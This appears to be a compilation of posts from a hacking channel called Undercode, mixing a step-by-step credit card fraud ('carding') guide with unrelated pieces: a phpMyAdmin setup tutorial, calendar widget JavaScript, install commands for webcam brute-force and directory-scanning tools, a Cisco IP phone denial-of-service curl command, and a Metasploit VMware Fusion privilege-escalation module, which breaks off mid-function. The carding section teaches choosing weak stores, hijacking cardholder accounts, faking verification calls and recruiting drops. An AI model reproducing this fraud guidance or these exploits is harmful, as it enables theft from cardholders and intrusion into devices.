UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World's first platform that collects & analyzes every new hacking method
+ AI Practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
→ Undercode.help
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘CARDING TRICK 5 -xd this one posted on depweb by undercode-for secure yourself :
> Successful virtual clothing combing skills
t.me/UndercodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) Open your imagination and make your purchases approved by more and more stores. For example, remember that Americans usually shop for lunch or evening. This means that if you make a purchase at this time, it will first cause more trust. Second, hundreds of Americans will make purchases with you at the same time, and store employees cannot actually verify all the data. Also, pay attention to the Christmas holidays (or any other holidays).

> Thousands of people want to buy gifts for their loved ones or themselves. People buy various new and old products, which are both expensive and cheap. The online store should hire other workers who are not familiar with the verification system + they will not suspect that you are fraud. But when shopping on holidays, please remember that your order can only be approved within a few days. During this period, the cardholder will have time to see the loss of money, contact the bank and credit card will be blocked, and your order will not be sent.

2) Another tip is that you need to carefully choose a credit card for the online store. Your credit card must match the country (and sometimes even the city). In this case, you can give full play to your creativity and come up with an interesting story, want to give gifts to relatives living in the same country (city) as you.

3) I also recommend that you purchase a credit card that can be accessed online. Using the information you purchased, you can go to the cardholder ’s personal account and change all the data you need (bill address, phone number, email).

4) If the billing and shipping addresses match, the store will have no doubt that you are the cardholder and approve your order almost immediately. But it is also important to understand that the bank may not change your billing address, or the holder will see the changed information and block the credit card.

5) Choose the online store correctly. Check if it has the factors you need, size, delivery method, etc. You should not place orders in a huge market because they are likely to have an excellent anti-fraud system. It is best to choose a small online store where a few of the workers will not suspect that you are a liar. Buyers do not usually shop in such online stores, so store owners cannot hire qualified personnel to track shoppers ’purchases.

6) If the store suspects that you are a real cardholder, online support can use the phone to query all necessary information or ask you to scan your credit card. Experienced seniors know that with a small amount of money, they can hire someone who scans credit cards, and it looks just as convincing as the original.

7) But you have to solve the problem by phone yourself. You have several ways to solve this problem: let your phone call through the phone instead of you, or find someone else who agrees to make fake calls. Don't forget to give him CC and warn to speak on behalf of another person. If you want to call yourself, you need to dial a virtual phone number. This can be done using Skype. Do n’t forget that the phone code must match the country code drop. Also, make sure you do n’t give stress or even some details.

πŸ¦‘ As Australia and New Zealand are far from another world, online shopping has become very popular there. The online store without any problems accepts orders and sends packages around the world. But there are also difficulties. For example, the rarity of Australian or New Zealand cards in the market. Moreover, they are much more expensive than ordinary CCs because they are more difficult to obtain.
Written by Undercode

πŸ¦‘ CARDING DROPPING NOW πŸ™ˆ:
t.me/undercodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

Β»Congratulations, your order has been sent! But this is not all the problems that need to be solved. The fact that the store sends the package does not mean that it is in your hands. It happened that the police caught your fall, or he / she turned out to be a scam. Therefore, the correct descent must be selected, which will perfectly complete his / her work.

πŸ¦‘ There are two recruitment methods:

1) Warn him that you are a virtual truck, illegal orders will come to him. At first glance, this method has no advantage, because few people will agree to participate in the carding process. But in fact, everything is different. If descent agrees, he will correctly understand the nature of his work and you will be able to ask him / her to help you. For example, he can call support and introduce himself as a cardholder.

2) Don't tell anything. He would think that he participated in absolutely legal procedures and would not raise any other questions. According to my personal experience, this has many disadvantages rather than advantages. The drop will accidentally handle the package + cannot help you anyway. For example, there is a situation when Card sends a package to Blob. Dropped out of home, the package was sent back to the store. Of course, Card did n’t get his package and could n’t order again. The money is lost.

Β» In some cases, when the package is received, but the address is wrong when sending, and the sender did not receive the package.

πŸ¦‘ Virtual combing is still profitable

1) Although there are many problems with virtual combing, it is still a very profitable income. You can solve all the obstacles placed by banks and shops if you pay a little money or think enough.

2) You need to understand that the results of combing do not depend on the anti-fraud system, but on the store employees who approve your order. His decision can always be changed through a long story, because it is a gift from your wife, or important to you for other reasons. But if you get a stubborn worker, then you are powerless. Never forget the human factor, if things don't succeed, don't be discouraged. It will operate next time.

Written by Undercode
🦑 LET'S START SOME PHP TUTORIALS BY UNDERCODE - FAST TIPS

🦑 How to install phpMyAdmin under Linux? BY UNDERCODE


1) When installing Fedora, select the basic components Apache, MySQL and PHP. Managing the database is still more convenient through a graphical interface, so we install phpMyAdmin ourselves; the installation is very simple.

2) phpMyAdmin is a MySQL management tool that manages MySQL directly from the web.

3) Assume your web root directory (where the pages are stored) is /var/www/ and your host is reached at http://192.168.1.11/

4) You can install it to /var/www/phpmyadmin or, of course, any subdirectory of /var/www/

Note that the name of this directory is best known only to the administrator. Therefore, we assume /var/www/onlyyouknow

A. First go to the official phpMyAdmin website and download the latest phpMyAdmin program

http://superb-east.dl.sourceforge.net/sourceforge/phpmyadmin/phpMyAdmin-2.11.3-all-languages.tar.gz

Download phpMyAdmin-2.11.3-all-languages.tar.gz to /var/www/

# cd /var/www/

# wget http://superb-east.dl.sourceforge.net/sourceforge/phpmyadmin/phpMyAdmin-2.11.3-all-languages.tar.gz

Of course, you can also download it on your own Windows machine, edit it there, and upload it to the web server afterwards.

B. Unpack this file

# tar zxvf phpMyAdmin-2.11.3-all-languages.tar.gz

The files are now under /var/www/phpMyAdmin-2.11.3-all-languages

C. Rename the directory to /var/www/onlyyouknow

# mv /var/www/phpMyAdmin-2.11.3-all-languages /var/www/onlyyouknow

D. Modify the configuration file

1. Find the libraries/config.default.php file, copy it to the phpMyAdmin directory and rename the copy config.inc.php. Items 2-8 below must be set by hand. On Windows edit it with WordPad (not Notepad, because the file is UTF-8 encoded); under Linux edit it directly with vim.

2. Find $cfg['PmaAbsoluteUri'] and change it to the URL at which phpMyAdmin will be served

For example: $cfg['PmaAbsoluteUri'] = 'http://192.168.1.11/onlyyouknow/';

3. Find $cfg['Servers'][$i]['host'] = 'localhost'; (the default is usually right; leave it unless MySQL runs on another host)

4. Find $cfg['Servers'][$i]['auth_type'] = 'config';

Use config for debugging on your own machine. On a host reachable from the network use cookie: since we already set the URL above, change this value to 'cookie'. We recommend cookie.

5. Find $cfg['Servers'][$i]['user'] = 'root'; // MySQL user (the MySQL user name; on your own machine use root)

6. Find $cfg['Servers'][$i]['password'] = ''; // MySQL password (the password of that MySQL user; on a hosted server it is generally the password of the MySQL root user)

7. Find $cfg['Servers'][$i]['only_db'] = ''; // If set to a db-name, only that database is shown (set it if you only have one database; if the server runs on this machine, it is recommended to leave it blank)

8. Find $cfg['DefaultLang'] = 'zh'; (this selects the language; zh stands for Simplified Chinese, I don't know whether gbk should be entered instead)

9. Save after setting

If you see “The configuration file now needs a secret passphrase (blowfish_secret)”, put a secret for your site between the quotes of $cfg['blowfish_secret'] = ''; (any characters). This is required because of your $cfg['Servers'][$i]['auth_type'] = 'cookie'.

E. Test

Open the browser at http://192.168.1.11/onlyyouknow/

A little personal opinion

We think that controlling MySQL through the MySQL root user from the web is not a very safe way. So my suggestion is: if it is your own server, move the phpMyAdmin directory to a directory the web server cannot access when you have finished using it, and move the whole directory back to its original location with the mv command when you need it again.
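Steps D.1 to D.9 and the closing advice, carried out as a script. This is an added example written for this edit, not code from the original post or from the phpMyAdmin project; the function names, the list of guessable directory names and the check rules are this example's own choices, and it assumes the phpMyAdmin 2.x config.inc.php keys used above.

```shell
#!/bin/sh
# Added example (not from the original post, not phpMyAdmin's own tooling).
# Writes a phpMyAdmin 2.x config.inc.php for the layout above: cookie auth,
# a random blowfish_secret, and no MySQL password on disk. The function names
# and the "guessable directory name" list are this example's own choices.
set -eu

# 32 random alphanumeric characters for $cfg['blowfish_secret'].
random_secret() {
    LC_ALL=C tr -dc 'A-Za-z0-9' < /dev/urandom | head -c 32
}

# choose_admin_dir <name>: return 1 for names anyone would guess first.
# The walkthrough recommends a name only the administrator knows.
choose_admin_dir() {
    case "$(printf '%s' "$1" | tr 'A-Z' 'a-z')" in
        phpmyadmin|pma|myadmin|phpmyadmin-*|mysql|admin|"")
            echo "refusing guessable directory name: $1" >&2
            return 1 ;;
    esac
    return 0
}

# write_pma_config <dir> <absolute-uri> [mysql-host] [lang]
# Generates <dir>/config.inc.php with the keys from steps 2-8 above.
write_pma_config() {
    dir=$1
    uri=$2
    host=${3:-localhost}
    lang=${4:-en}
    secret=$(random_secret)
    mkdir -p "$dir"
    cat > "$dir/config.inc.php" <<EOF
<?php
/* Generated config: cookie auth, so the MySQL password is never stored here. */
\$cfg['PmaAbsoluteUri'] = '$uri';
\$cfg['blowfish_secret'] = '$secret';
\$i = 1;
\$cfg['Servers'][\$i]['host'] = '$host';
\$cfg['Servers'][\$i]['auth_type'] = 'cookie';
\$cfg['Servers'][\$i]['user'] = '';
\$cfg['Servers'][\$i]['password'] = '';
\$cfg['Servers'][\$i]['only_db'] = '';
\$cfg['DefaultLang'] = '$lang';
?>
EOF
    # Readable by the owner and the web server group only.
    chmod 640 "$dir/config.inc.php"
}

# check_pma_config <file>: return 1 if the file still has the weak settings
# (auth_type 'config', a stored password, or an empty blowfish_secret).
check_pma_config() {
    f=$1
    if ! grep -qF "['auth_type'] = 'cookie';" "$f"; then
        echo "$f: auth_type is not 'cookie'" >&2
        return 1
    fi
    if ! grep -qF "['password'] = '';" "$f"; then
        echo "$f: a MySQL password is stored on disk" >&2
        return 1
    fi
    if grep -qF "['blowfish_secret'] = '';" "$f"; then
        echo "$f: blowfish_secret is empty" >&2
        return 1
    fi
    return 0
}

# Stand-alone run: build the layout from the walkthrough under a temp dir.
main() {
    root=$(mktemp -d)
    choose_admin_dir onlyyouknow
    write_pma_config "$root/onlyyouknow" 'http://192.168.1.11/onlyyouknow/'
    check_pma_config "$root/onlyyouknow/config.inc.php" && echo "config OK"
    rm -rf "$root"
}

main
```

On a real install, point write_pma_config at the renamed directory from step C and keep the generated file outside any directory the web server can list.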

Written by Undercode

🦑 Forwarding a PHP guide by Undercode:
twitter.com/undercodeNews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :


<style type="text/css">
body {
background-color: #D4D0C8;
}
.m_fieldset {
padding: 0 10px 5px 10px;
text-align: center;
width: 150px;
}
.m_legend {
font-family: Tahoma;
font-size: 11px;
padding-bottom: 5px;
}
.m_frameborder {
border-left: 2px inset #D4D0C8;
border-top: 2px inset #D4D0C8;
border-right: 2px inset #FFFFFF;
border-bottom: 2px inset #FFFFFF;
width: 100px;
height: 19px;
background-color: #FFFFFF;
overflow: hidden;
text-align: right;
font-family: "Tahoma";
font-size: 10px;
}
.m_arrow {
width: 16px;
height: 8px;
font-family: "Webdings";
font-size: 7px;
line-height: 2px;
padding-left: 2px;
cursor: default;
}
.m_input {
width: 18px;
height: 14px;
border: 0px solid black;
font-family: "Tahoma";
font-size: 9px;
text-align: right;
ime-mode:disabled;
}
</style>

<script language="javascript">
// Written by cloudchen, 2004/03/15
function minute(name,fName)
{
this.name = name;
this.fName = fName || "m_input";
this.timer = null;
this.fObj = null;

this.toString = function()
{
var objDate = new Date();
var sMinute_Common = "class=\"m_input\" maxlength=\"2\" name=\""+this.fName+"\" onfocus=\""+this.name+".setFocusObj(this)\" onblur=\""+this.name+".setTime(this)\" onkeyup=\""+this.name+".prevent(this)\" onkeypress=\"if (!/[0-9]/.test(String.fromCharCode(event.keyCode)))event.keyCode=0\" onpaste=\"return false\" ondragenter=\"return false\"";
var sButton_Common = "class=\"m_arrow\" onfocus=\"this.blur()\" onmouseup=\""+this.name+".controlTime()\" disabled"
var str = "";
str += "<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\">"
str += "<tr>"
str += "<td>"
str += "<div class=\"m_frameborder\">"
str += "<input radix=\"24\" value=\""+this.formatTime(objDate.getHours())+"\" "+sMinute_Common+">:"
str += "<input radix=\"60\" value=\""+this.formatTime(objDate.getMinutes())+"\" "+sMinute_Common+">:"
str += "<input radix=\"60\" value=\""+this.formatTime(objDate.getSeconds())+"\" "+sMinute_Common+">"
str += "</div>"
str += "</td>"
str += "<td>"
str += "<table border=\"0\" cellspacing=\"2\" cellpadding=\"0\">"
str += "<tr><td><button id=\""+this.fName+"_up\" "+sButton_Common+">5</button></td></tr>"
str += "<tr><td><button id=\""+this.fName+"_down\" "+sButton_Common+">6</button></td></tr>"
str += "</table>"
str += "</td>"
str += "</tr>"
str += "</table>"
return str;
}
this.play = function()
{
this.timer = setInterval(this.name+".playback()",1000);
}
this.formatTime = function(sTime)
{
sTime = ("0"+sTime);
return sTime.substr(sTime.length-2);
}
this.playback = function()
{
var objDate = new Date();
var arrDate = [objDate.getHours(),objDate.getMinutes(),objDate.getSeconds()];
var objMinute = document.getElementsByName(this.fName);
for (var i=0;i<objMinute.length;i++)
{
objMinute[i].value = this.formatTime(arrDate[i])
}
}
this.prevent = function(obj)
{
clearInterval(this.timer);
this.setFocusObj(obj);
var value = parseInt(obj.value,10);
var radix = parseInt(obj.radix,10)-1;
if (obj.value>radix||obj.value<0)
{
obj.value = obj.value.substr(0,1);
}
}
this.controlTime = function(cmd)
{
event.cancelBubble = true;
if (!this.fObj) return;
clearInterval(this.timer);
var cmd = event.srcElement.innerText=="5"?true:false;
var i = parseInt(this.fObj.value,10);
var radix = parseInt(this.fObj.radix,10)-1;
if (i==radix&&cmd)
{
i = 0;
}
else if (i==0&&!cmd)
{
i = radix;
}
else
{
cmd?i++:i--;
}
this.fObj.value = this.formatTime(i);
this.fObj.select();
}
this.setTime = function(obj)
{
obj.value = this.formatTime(obj.value);
}
this.setFocusObj = function(obj)
{
document.getElementById(this.fName+"_up").disabled = document.getElementById(this.fName+"_down").disabled = false;
this.fObj = obj;
}
this.getTime = function()
{
var arrTime = new Array(2);
for (var i=0;i<document.getElementsByName(this.fName).length;i++)
{
arrTime[i] = document.getElementsByName(this.fName)[i].value;
}
return arrTime.join(":");
}
}
</script>
<style type="text/css">
body {
background-color: #D4D0C8;
}
.c_fieldset {
padding: 0 10px 5px 10px;
text-align: center;
width: 180px;
}
.c_legend {
font-family: Tahoma;
font-size: 11px;
padding-bottom: 5px;
}
.c_frameborder {
border-left: 2px inset #D4D0C8;
border-top: 2px inset #D4D0C8;
border-right: 2px inset #FFFFFF;
border-bottom: 2px inset #FFFFFF;
background-color: #FFFFFF;
overflow: hidden;
font-family: "Tahoma";
font-size: 10px;
width:160px;
height:120px;
}
.c_frameborder td {
width: 23px;
height: 16px;
font-family: "Tahoma";
font-size: 11px;
text-align: center;
cursor: default;
}
.c_frameborder .selected {
background-color:#0A246A;
width:12px;
height:12px;
color:white;
}
.c_frameborder span {
width:12px;
height:12px;
}
.c_arrow {
width: 16px;
height: 8px;
font-family: "Webdings";
font-size: 7px;
line-height: 2px;
padding-left: 2px;
cursor: default;
}
.c_year {
font-family: "Tahoma";
font-size: 11px;
cursor: default;
width:55px;
height:19px;
}
.c_month {
width:75px;
height:20px;
font:11px "Tahoma";
}
.c_dateHead {
background-color:#808080;
color:#D4D0C8;
}
</style>

<script language="javascript">
// Written by cloudchen, 2004/03/16
function calendar(name,fName)
{
this.name = name;
this.fName = fName || "calendar";
this.year = new Date().getFullYear();
this.month = new Date().getMonth();
this.date = new Date().getDate();
//private
this.toString = function()
{
var str = "";
str += "<table border=\"0\" cellspacing=\"3\" cellpadding=\"0\" onselectstart=\"return false\">";
str += "<tr>";
str += "<td>";
str += this.drawMonth();
str += "</td>";
str += "<td align=\"right\">";
str += this.drawYear();
str += "</td>";
str += "</tr>";
str += "<tr>";
str += "<td colspan=\"2\">";
str += "<div class=\"c_frameborder\">";
str += "<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" class=\"c_dateHead\">";
str += "<tr>";
str += "<td>日</td><td>一</td><td>二</td><td>三</td><td>四</td><td>五</td><td>六</td>";
str += "</tr>";
str += "</table>";
str += this.drawDate();
str += "</div>";
str += "</td>";
str += "</tr>";
str += "</table>";
return str;
}
//private
this.drawYear = function()
{
var str = "";
str += "<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\">";
str += "<tr>";
str += "<td>";
str += "<input class=\"c_year\" maxlength=\"4\" value=\""+this.year+"\" name=\""+this.fName+"\" id=\""+this.fName+"_year\" readonly>";
//DateField
str += "<input type=\"hidden\" name=\""+this.fName+"\" value=\""+this.date+"\" id=\""+this.fName+"_date\">";
str += "</td>";
str += "<td>";
str += "<table cellspacing=\"2\" cellpadding=\"0\" border=\"0\">";
str += "<tr>";
str += "<td><button class=\"c_arrow\" onfocus=\"this.blur()\" onclick=\"event.cancelBubble=true;document.getElementById('"+this.fName+"_year').value++;"+this.name+".redrawDate()\">5</button></td>";
str += "</tr>";
str += "<tr>";
str += "<td><button class=\"c_arrow\" onfocus=\"this.blur()\" onclick=\"event.cancelBubble=true;document.getElementById('"+this.fName+"_year').value--;"+this.name+".redrawDate()\">6</button></td>";
str += "</tr>";
str += "</table>";
str += "</td>";
str += "</tr>";
str += "</table>";
return str;
}
//private
this.drawMonth = function()
{
var aMonthName = ["一","二","三","四","五","六","七","八","九","十","十一","十二"];
var str = "";
str += "<select class=\"c_month\" name=\""+this.fName+"\" id=\""+this.fName+"_month\" onchange=\""+this.name+".redrawDate()\">";
for (var i=0;i<aMonthName.length;i++) {
str += "<option value=\""+(i+1)+"\" "+(i==this.month?"selected":"")+">"+aMonthName[i]+"月</option>";
}
str += "</select>";
return str;
}
//private
this.drawDate = function()
{
var str = "";
var fDay = new Date(this.year,this.month,1).getDay();
var fDate = 1-fDay;
var lDay = new Date(this.year,this.month+1,0).getDay();
var lDate = new Date(this.year,this.month+1,0).getDate();
str += "<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" id=\""+this.fName+"_dateTable"+"\">";
for (var i=1,j=fDate;i<7;i++)
{
str += "<tr>";
for (var k=0;k<7;k++)
{
str += "<td><span"+(j==this.date?" class=\"selected\"":"")+" onclick=\""+this.name+".redrawDate(this.innerText)\">"+(isDate(j++))+"</span></td>";
}
str += "</tr>";
}
str += "</table>";
return str;

function isDate(n)
{
return (n>=1&&n<=lDate)?n:"";
}
}
//public
this.redrawDate = function(d)
{
this.year = document.getElementById(this.fName+"_year").value;
this.month = document.getElementById(this.fName+"_month").value-1;
this.date = d || this.date;
document.getElementById(this.fName+"_year").value = this.year;
document.getElementById(this.fName+"_month").selectedIndex = this.month;
document.getElementById(this.fName+"_date").value = this.date;
if (this.date>new Date(this.year,this.month+1,0).getDate()) this.date = new Date(this.year,this.month+1,0).getDate();
document.getElementById(this.fName+"_dateTable").outerHTML = this.drawDate();
}
//public
this.getDate = function(delimiter)
{
if (!delimiter) delimiter = "/";
var aValue = [this.year,(this.month+1),this.date];
return aValue.join(delimiter);
}
}
</script>
<table border="0">
<tr><td>
<fieldset class="c_fieldset"><legend class="c_legend">日期(T)</legend>
<script>
var c = new calendar("c");
document.write(c);
</script>

</fieldset>
</td>
<td valign="top">
<fieldset class="m_fieldset"><legend class="m_legend">Time (T)</legend>
<script>
// Call Time
var m = new minute("m");
m.play();
document.write(m);
</script>
</fieldset>
</td></tr>
<tr>
<td colspan="2">
<button onclick="alert(c.getDate())" style="font:8px Webdings;width:15px;height:15px;line-height:6px;">4</button>
<button style="font:10px Arial;height:15px;height:16px;border:0px;" onfocus="this.blur()">GetDate</button>

<button onclick="alert(m.getTime())" style="font:8px Webdings;width:15px;height:15px;line-height:6px;">4</button>
<button style="font:10px Arial;height:15px;height:16px;border:0px;" onfocus="this.blur()">GetTime</button>
</td>
</tr>
</table>

Written by Undercode
🦑 Those PHP guides by Undercode are good for now; let's send some Termux/Linux tips & some accounts

🦑 Exploit old webcams

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

What does the tool to? Look, a list!

> Search

> Brute force

> SSID and WPAPSK Password Disclosure

> E-mail, FTP, DNS, MSN Password Disclosure

> Exploit

πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„• :

$ cd /opt/

$ git clone https://github.com/fbctf/shodanwave.git

$ cd shodanwave

$ pip install -r requirements.txt

Usage: python shodanwave.py -u usernames.txt -w passwords.txt -k <Shodan API key> --t OUTPUT

python shodanwave.py --help

🦑 Modify your tsocks config!!

Add/Modify the following at the bottom:
server =
server_type = <4 or 5>
server_port =
default_pass = (Might be required for proxy)

@undercodeTesting

🦑 Easy way to brute-force web directories.


πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„• :


1) git clone https://github.com/abaykan/crawlbox.git

2) cd crawlbox/

3) pip install -r requirements.txt

python crawlbox.py -h
url specific target url, like domain.com
optional arguments:

-h, --help show this help message and exit
-v, --version show program's version number and exit
-w WORDLIST specific path to wordlist file
-d DELAY add delay between requests

🦑 MacOSX
Kali Linux
Ubuntu 16.04


🦑 TESTED BY UNDERCODE ‼️

# Exploit Title: Cisco IP Phone 11.7 - Denial of Service (PoC)
# Date: 2020-04-15
# Exploit Author: Jacob Baines
# Vendor Homepage: https://www.cisco.com
# Software Link: https://www.cisco.com/c/en/us/products/collaboration-endpoints/ip-phones/index.html
# Version: Before 11.7(1)
# Tested on: Cisco Wireless IP Phone 8821
# CVE: CVE-2020-3161
# Cisco Advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs
# Researcher Advisory: https://www.tenable.com/security/research/tra-2020-24

curl -v --path-as-is --insecure
https://phone_address/deviceconfig/setActivationCode?params=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

@undercodeTesting

🦑 VMWARE 2020 EXPLOIT TESTED BY UNDERCODE:
AVAILABLE AT DEEP WEB & EXPLOIT DB:


πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::OSX::Priv
  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'VMware Fusion USB Arbitrator Setuid Privilege Escalation',
        'Description' => %q(
          This exploits an improper use of setuid binaries within VMware Fusion 10.1.3 - 11.5.3.
          The Open VMware USB Arbitrator Service can be launched outside of its standard path
          which allows loading of an attacker controlled binary. By creating a payload in the
          user home directory in a specific folder, and creating a hard link to the 'Open VMware
          USB Arbitrator Service' binary, we're able to launch it temporarily to start our payload
          with an effective UID of 0.
          discovered an incomplete patch in 11.5.3 with a TOCTOU race.
          Successfully tested against 10.1.6, 11.5.1, 11.5.2, and 11.5.3.
        ),
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'h00die', # msf module
            'Dhanesh Kizhakkinan', # discovery
            'Rich Mirch', # edb module
            'jeffball <jeffball@dc949.org>', # 11.5.3 exploit
            'grimm'
          ],
        'Platform' => [ 'osx' ],
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        'SessionTypes' => [ 'shell', 'meterpreter' ],
        'Targets' => [[ 'Auto', {} ]],
        'Privileged' => true,
        'References' =>
          [
            [ 'CVE', '2020-3950' ],
            [ 'EDB', '48235' ],
            [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0005.html' ],
            [ 'URL', 'https://twitter.com/jeffball55/status/1242530508053110785?s=20' ],
            [ 'URL', 'https://github.com/grimm-co/NotQuite0DayFriday/blob/master/2020.03.17-vmware-fusion/notes.txt' ]
          ],
        'DisclosureDate' => 'Mar 17 2020',
        'DefaultOptions' =>
          {
            'PAYLOAD' => 'osx/x64/meterpreter_reverse_tcp',
            'WfsDelay' => 15
          }
      )
    )

    register_options [
      OptInt.new('MAXATTEMPTS', [true, 'Maximum attempts to win race for 11.5.3', 75])
    ]

    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false])
    ]
  end

  def open_usb_service
    'Open VMware USB Arbitrator Service'
  end

  def usb_service
    'VMware USB Arbitrator Service'
  end

  def get_home_dir
    home = cmd_exec 'echo ~'
    if home.blank?
      fail_with Failure::BadConfig, 'Unable to determine home dir for shell.'
    end
    home
  end

  def content_dir
    "#{get_home_dir}/Contents"
  end

  def base_dir
    "#{content_dir}/Library/services/"
  end

  def kill_process(executable)
    pid_kill = cmd_exec %(ps ax | grep #{executable} | grep -v grep | awk '{print "kill -9 " $1}')
    cmd_exec pid_kill
  end

  def get_version
    # Thanks to @ddouhine on github for this answer!
    version_raw = cmd_exec "plutil -p '/Applications/VMware Fusion.app/Contents/Info.plist' | grep CFBundleShortVersionString"
    /=> "(?<version>\d{0,2}\.\d{0,2}\.\d{0,2})"/ =~ version_raw # supposed 11.x is also vulnerable, but everyone who's tested shows 11.5.1 or 11.5.2
    if version_raw.blank?
